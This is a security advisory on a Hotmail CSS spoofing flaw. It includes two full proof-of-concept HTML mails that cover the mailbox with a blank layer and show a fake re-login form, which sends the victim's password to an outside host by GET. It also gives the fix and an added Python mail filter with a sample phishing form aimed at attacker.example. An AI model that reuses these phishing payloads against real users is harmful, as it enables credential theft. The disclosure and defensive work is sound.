
Hotmail - hiding warnings



Vulnerability

    Hotmail

Affected

    Hotmail

Description

    Gregory Duchemin found the following.  In his advisory, Ben Li
    described a bug in most next-generation browsers that handle CSS,
    where a broken image leads to a general corruption of the HTML
    links on the page:

        webmail4.htm

    A similar problem exists with CSS used inside a web-based mail
    service, this time with a plain image and no link needed.  It is
    possible to craft trojan mails that harvest personal information
    from the user, such as passwords.  This is no longer a bug in the
    browsers, but in the implementation of the servers' HTML filters.

    Gregory tested this with Hotmail and MSIE 4/5 (NT) and it worked
    perfectly.  In fact we have here a very serious hole.

    It was possible (at least with Hotmail) to use a background layer
    holding a completely blank picture to erase the whole browser
    screen (the Hotmail desktop), and then, with another layer on top
    carrying a slightly modified password prompt, it would be easy to
    fool most people.

    A simple img tag referencing an outside 1x1 white pixel picture,
    expanded to 1280x768, is enough for the background layer and will
    wipe everything.

    Since the new frame appears over the first one, and not in a new
    window as it usually would, the Microsoft top-frame warning that
    the user is leaving Hotmail no longer shows up.

    So, from the user's side, just after clicking on a mail to read
    it, the screen shows what he would trust to be the Hotmail relogin
    page.  The URL in the browser is still Hotmail's, so he has no
    really obvious reason to worry, unless he went through the same
    login page two minutes earlier.

    The relogin page, embedded in the mail inside the top layer, will
    not be exactly the same as the original one: the form fields may
    be changed to use an insecure http connection and the GET method
    while pointing to the attacker's web server.  With the password
    then sitting in his web server logs, the attacker may finally
    redirect the victim to the real page.

    Below is only the skeleton ("some skulls") of a mail exploit, since
    copyrighted material would be needed for the rest.

        <div align="left">

        <div id="layer1" style="width:99px; height:99px; position:absolute;
        left:0px; top:0px; z-index:0;">
        <!-- First Layer, a big blank screen to hide the Hotmail desk -->

        <div id="layer2" style="position:absolute; left:140; top:100; z-index:0;">
        <!-- Layer 2, will show up text, pics, form -->

        <!-- Here the new hotmail login.html that points to our web server.
             Needs the Microsoft login page with all copyrighted
             logos, banners ... -->

        </div>
        </div>
        </div>

    Gregory Duchemin sent the following as the proof of concept for
    CSS Hotmail spoofing / password recovery.  To use it, mail it to
    yourself only, not to others.  All graphics were made by the
    author to show explicitly that it is not the real Hotmail relogin
    page, thus preventing any abuse and copyright violation.  This
    worked fine with MSIE and would need some small changes to work
    on Netscape.  Note that there are two versions here.

    <html>

    <!-- H0RSEM4IL.c0m , trojanized mail to catch users' passwords.

         A proof of concept for most web-based mailers.
         Tested on Hotmail with MSIE.

         To try it, just mail this page to a Hotmail mailbox, but remember:
         this page is for educational purposes ONLY !

    -->



    <body>

    <div align="left">
      <div id="layer1" style="width:1280px; height:768px; position:absolute; left:0px; top:0px; z-index:0;">

        <!-- First Layer, a big blank screen to hide Hotmail desk -->

            <div id="layer2" style="position:absolute; left:40; top:100; z-index:0;">

            <!-- Layer 2, will show up the near to original hotmail re-enter
                 password screen ;) -->

            <!-- Here we have slightly modified the original hotmail login.html to point
                 to our own site with the GET method, to catch the password in our logs -->

	    <form name="passwordform" action="http://c3rber.multimania.com/merci.txt" method="GET" target="_top" AUTOCOMPLETE="OFF" >
            <table cellpadding=0 cellspacing=0 border=0 width=590>
	    <tr>
	    <td colspan=2>
	    <table cellpadding=0 cellspacing=0 border=0 width="100%"><tr><td>
	    <a href="javascript:void()" target="_top"><img src="http://c3rber.multimania.com/horsemail.gif" width=468 height=60 border=0 alt=""></a>
	    </td>
	    <td align="CENTER" nowrap>
	    <img src="http://c3rber.multimania.com/pass.gif" width=140 height=44 border=0 alt="Find Out More About Passport"><br>
            <a href="javascript:void()" target="_top"><font class="f" size=2>Help</font></a><br>
	    </td></tr></table>
	    </td>
	    </tr><tr>
	    <td bgcolor="#cccc99"><font class="f" size=4><b>Please re-enter your password at your own risk</b></font></td>
	    <td valign="top"><table width="100%" border=0 cellspacing=0 cellpadding=0><tr><td height=1 bgcolor="#cccc99"></td></tr></table></td>
	    </tr>
	    <tr><td height="6"></td></tr>
	    <tr valign="top">
	    <td><font class="s">

	    </font>
	    </td>
	    <td rowspan=4><font class="s">

	    </font>
            </td>
	    </tr>

            <tr>
            <td>
            <font class="f" size=2><b>&lt;victim@hotmail.com&gt;</b></font>
	    <input type="hidden" name="domain" value="hotmail.com">
            <table cellpadding=0 cellspacing=0>
            <tr>
            <td height=35 valign="middle"><font class="sbd">Password</font> </td>
            <td><input type="password" name="passwd" size="16" maxlength="16"></td>
            <td width=22 valign="middle" align="center"> </td>
            <td><input type="submit" name="enter" value="Sign in"></td>
            </tr>
            <tr>
            <td></td>
            <td colspan="2"><font class="f" size=2><b><a href="javascript:void()" target="_top">Change
                User</a></b></font></td>
            </tr>
	    </table>

            </table>
            </form>
	    <table cellpadding=0 cellspacing=0 border=0 width=590>
	    <tr>
	    <td> 
            <font class="s">Fake © 2001 P0w3rsoft Corporation. All rights not reserved.</font>
            <a href="javascript:void()"><font class="s">H0rsemail TERMS OF USE and NOTICES</font></a>  
            <a href="javascript:void()"><font class="s">untrusted Privacy Statement</font></a>
	    </td>
	    </tr>
	    </table>





           </div>

           <p align="center">

           <img src="http://c3rber.multimania.com/hotmail.jpg" width="1280" height="950" border="0" >
           </div>

           </div>

      </body>

    <!--

         Gregory Duchemin  - Security Consultant -
         NEUROCOM CANADA
         1001 bd Maisonneuve Ouest - suite 200
         H3A 3C8 Montreal - Quebec - CANADA
         c3rb3r@hotmail.com

         Original idea : Ben Li <bali@THOCK.COM>


      -->
    </html>

    The above exploit is broken with MSIE 5.50: the background image
    won't appear at all, and anyway it was a bad idea to use it.
    Below is a new version that works with MSIE 4/5/5.50; the
    background color is now set to a blank value (#ffffff) in the div
    class (which also removes one useless connection).

    The mail folder navigator's select input, which buggily showed
    through on the top layer, was fixed too by playing with its
    properties (select { visibility: hidden }).  The scrollbar at the
    bottom was reduced with the help of the class width parameter.
    You will have to choose it according to the screen resolution of
    the trojan's receiver; if you don't know it, just take a big value.

    But this exploit isn't absolutely perfect: the advertising iframe
    at the top middle still shows, since we can't use JavaScript to
    modify its properties.  The iframe tag itself is really interesting
    but is already filtered by Hotmail and Yahoo; it may still be
    usable on some of the sites in the cross-vulnerable list that was
    circulated here some weeks ago.

    NOTE: to work properly, the message MUST BEGIN with the html tag
    (nothing above it).  Don't use it for any malicious activity:

    <html>
    <div align="left">
    
    <style type="text/css">
    <!--
    div.trojan {
    background-color: #ffffff;
    background-repeat: repeat;
    position: absolute;
    width: 850px;
    height: 950px;
    top: 0px;
    left: 0px;
    visibility: visible;
    z-index: 0;
    font-family: times;
    font-size: 72px;
    }
    -->
    </style>
    
    <div id="layer1" class="trojan">
    <div id="layer2" class="trojan" style="left:80px;top:100px;
    ">
    
    <form name="passwordform" action="http://c3rber.multimania.com/merci.txt" method="GET" target="_blank" AUTOCOMPLETE="OFF" >
    
            <table cellpadding=0 cellspacing=0 border=0 width=590>
	    <tr>
	    <td colspan=2>
	    <table cellpadding=0 cellspacing=0 border=0 width="100%"><tr><td>
	    <a href="#" ><img src="http://c3rber.multimania.com/horsemail.gif" width=468 height=60 border=0 alt=""></a>
	    </td>
	    <td align="CENTER" nowrap>
	    <img src="http://c3rber.multimania.com/pass.gif" width=140 height=44 border=0 alt="Find Out More About Passport"><br>
            <a href="#" ><font class="f" size=2>Help</font></a><br>
	    </td></tr></table>
	    </td>
	    </tr><tr>
	    <td bgcolor="#cccc99"><font class="f" size=4><b>Please re-enter your password at your own risk</b></font></td>
	    <td valign="top"><table width="100%" border=0 cellspacing=0 cellpadding=0><tr><td height=1 bgcolor="#cccc99"></td></tr></table></td>
	    </tr>
	    <tr><td height="6"></td></tr>
	    <tr valign="top">
	    <td><font class="s">
    
	    </font>
	    </td>
	    <td rowspan=4><font class="s">
    
	    </font>
            </td>
	    </tr>
    
            <tr>
            <td>
            <font class="f" size=2><b>&lt;victim@hotmail.com&gt;</b></font>
            <table cellpadding=0 cellspacing=0>
            <tr>
            <td height=35 valign="middle"><font class="sbd">Password</font> </td>
            <td><input type="password" name="passwd" size="16" maxlength="16"></td>
            <td width=22 valign="middle" align="center"> </td>
            <td><input type="submit" name="enter" value="Sign in"></td>
            </tr>
            <tr>
            <td></td>
            <td colspan="2"><font class="f" size=2><b><a href="#" >Change
                User</a></b></font></td>
            </tr>
	    </table>
    
            </table>
            </form>
	    <table cellpadding=0 cellspacing=0 border=0 width=590>
	    <tr>
	    <td> 
            <font class="s">Hotmail © Cross-scripting/css 2001 Proof of concept. C3rb3r (January 2001).</font>
            <a href="javascript:Filtered()" target="_blank"><font class="s">H0rsemail TERMS OF USE and NOTICES</font></a>  
            <a href="javascript:Filtered()" target="_blank"><font class="s">untrusted Privacy Statement</font></a>
	    </td>
	    </tr>
	    </table>
    
    
    
    
    
           </div>
    
           <p align="center">
    
           </div>
    
           </div>
    
    
    
    
    
    <style type="text/css">
    <!--
    input { visibility: hidden }
    select { visibility: hidden; color: #ffffff }
    option { visibility: hidden; color: #ffffff }
    iframe { visibility: hidden; color: #ffffff }
    div {
    background-color: #ffffff;
    background-repeat: repeat;
    position: absolute;
    width: 0px;
    height: 0px;
    top: 0px;
    left: 0px;
    visibility: hidden;
    z-index: 1;
    font-family: times;
    font-size: 72px;
    }
    -->
    </style>
    
    <!--
        Gregory Duchemin  - Security Consultant -
        NEUROCOM CANADA
        1001 bd Maisonneuve Ouest - suite 200
        H3A 3C8 Montreal - Quebec - CANADA
        c3rb3r@hotmail.com
    
        Just a proof of concept, don't use it for illegal purposes
    
        Original idea : Ben Li <bali@THOCK.COM>
    
      -->
    
    <div id="trash">
    <!--

Solution

    Hotmail has fixed the "css hotmail spoofing/ password recovery"
    bug.  Hotmail now replaces "position: absolute" with "position:
    static".
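
    The following Python is an added example, not part of Gregory's
    advisory and not Hotmail's own code.  It shows the server-side view
    of both halves of this page: it flags the indicators described in
    the description (a large absolute-positioned layer, a password form
    whose action GETs to an off-site http host, and the <style> and
    <iframe> elements the second PoC relies on), and it applies the
    fix stated in the Solution, rewriting every inline position to
    static while also stripping z-index, top, left and visibility so the
    element stays in normal flow.  The sample mail, the attacker.example
    host and the use of hotmail.com as the trusted host are constructed
    for the demonstration.

```python
import re
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlparse

DROP_TAGS = {"style", "script", "iframe"}   # a webmail filter never passes these through
LAYERING_PROPS = ("z-index", "top", "left", "visibility")   # with position: lets a layer cover the UI

def parse_style(style):
    """'a: b; c: d' -> {'a': 'b', 'c': 'd'}, names and values lowercased."""
    props = {}
    for decl in style.split(";"):
        if ":" in decl:
            name, value = decl.split(":", 1)
            props[name.strip().lower()] = value.strip().lower()
    return props

def sanitize_style(style):
    """The documented fix (any position -> static) plus removal of offset, stacking
    and visibility properties, so the element can only render in normal flow."""
    props = parse_style(style)
    if props.get("position", "static") != "static":
        props["position"] = "static"
    for name in LAYERING_PROPS:
        props.pop(name, None)
    return "; ".join(f"{k}: {v}" for k, v in props.items())

def _px(value):
    match = re.fullmatch(r"(\d+)(px)?", (value or "").strip())   # '1280px' -> 1280
    return int(match.group(1)) if match else 0

class MailHtmlFilter(HTMLParser):
    """Re-serialises a mail body with sanitised styles and records indicators.  Comments
    are dropped (HTMLParser's default), which also defuses the unclosed '<!--' of PoC 2."""

    def __init__(self, trusted_host):
        super().__init__(convert_charrefs=True)
        self.trusted_host, self.out, self.findings = trusted_host, [], []
        self._skip = None   # tag whose content is currently being dropped
        self._form = None   # state of the open <form>, if any

    def handle_starttag(self, tag, attrs):
        if self._skip:
            return
        if tag in DROP_TAGS:             # the matching handle_endtag clears _skip
            self.findings.append(f"dropped <{tag}>")
            self._skip = tag
            return
        seen = {}
        for name, value in attrs:        # browsers keep the first duplicate attribute
            seen.setdefault(name, value)
        style = seen.get("style")
        if style is not None:
            props = parse_style(style)
            w, h = _px(props.get("width")), _px(props.get("height"))
            if props.get("position") == "absolute" and max(w, h) >= 600:
                self.findings.append(f"<{tag}> is an absolute layer {w}x{h} px")
            seen["style"] = sanitize_style(style)
        if tag == "form":
            url = urlparse(seen.get("action") or "")
            self._form = {"host": url.hostname or "", "scheme": url.scheme,
                          "method": (seen.get("method") or "get").lower(), "password": False}
        if tag == "input" and self._form and (seen.get("type") or "").lower() == "password":
            self._form["password"] = True
        attr_text = "".join(f' {k}="{escape(v, quote=True)}"' if v is not None else f" {k}"
                            for k, v in seen.items())
        self.out.append(f"<{tag}{attr_text}>")

    def handle_endtag(self, tag):
        if self._skip:
            self._skip = None if tag == self._skip else self._skip
            return
        if tag == "form" and self._form:
            f, host = self._form, self._form["host"]
            if f["password"] and host and host != self.trusted_host and not host.endswith("." + self.trusted_host):
                self.findings.append(f"password form posts to {host} via {f['scheme']} {f['method'].upper()}")
            self._form = None
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self._skip:               # the parser unescaped this text; re-escape it
            self.out.append(escape(data, quote=False))

def filter_mail(html_body, trusted_host="hotmail.com"):
    """Return (sanitised_html, findings) for one HTML mail body."""
    parser = MailHtmlFilter(trusted_host)
    parser.feed(html_body)
    parser.close()
    return "".join(parser.out), parser.findings

# Constructed sample mirroring the PoC's structure: a white full-screen layer,
# then a layer carrying a password form that GETs to an off-site http host.
SAMPLE_MAIL = """<html><body><style type="text/css"><!-- select { visibility: hidden } --></style>
<div id="layer1" style="width:1280px; height:768px; position:absolute; left:0px; top:0px; z-index:0; background-color:#ffffff">
<div id="layer2" style="position:absolute; left:40px; top:100px; z-index:0;">
<form name="passwordform" action="http://attacker.example/merci.txt" method="GET" target="_top">
<b>&lt;victim@example.com&gt;</b> Password <input type="password" name="passwd" size="16">
<input type="submit" name="enter" value="Sign in"></form></div></div></body></html>"""
```

    Calling filter_mail(SAMPLE_MAIL) returns the cleaned markup (both
    layers now position: static, no z-index, no <style>) together with
    three findings: the dropped <style>, the 1280x768 absolute layer,
    and the password form posting to attacker.example over http GET.
    Dropping <style> outright is the blunt choice; a filter that wants
    to allow stylesheets would need to run the same property scrub over
    each rule in the block, because the select { visibility: hidden }
    trick of the second PoC lives there rather than in an attribute.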

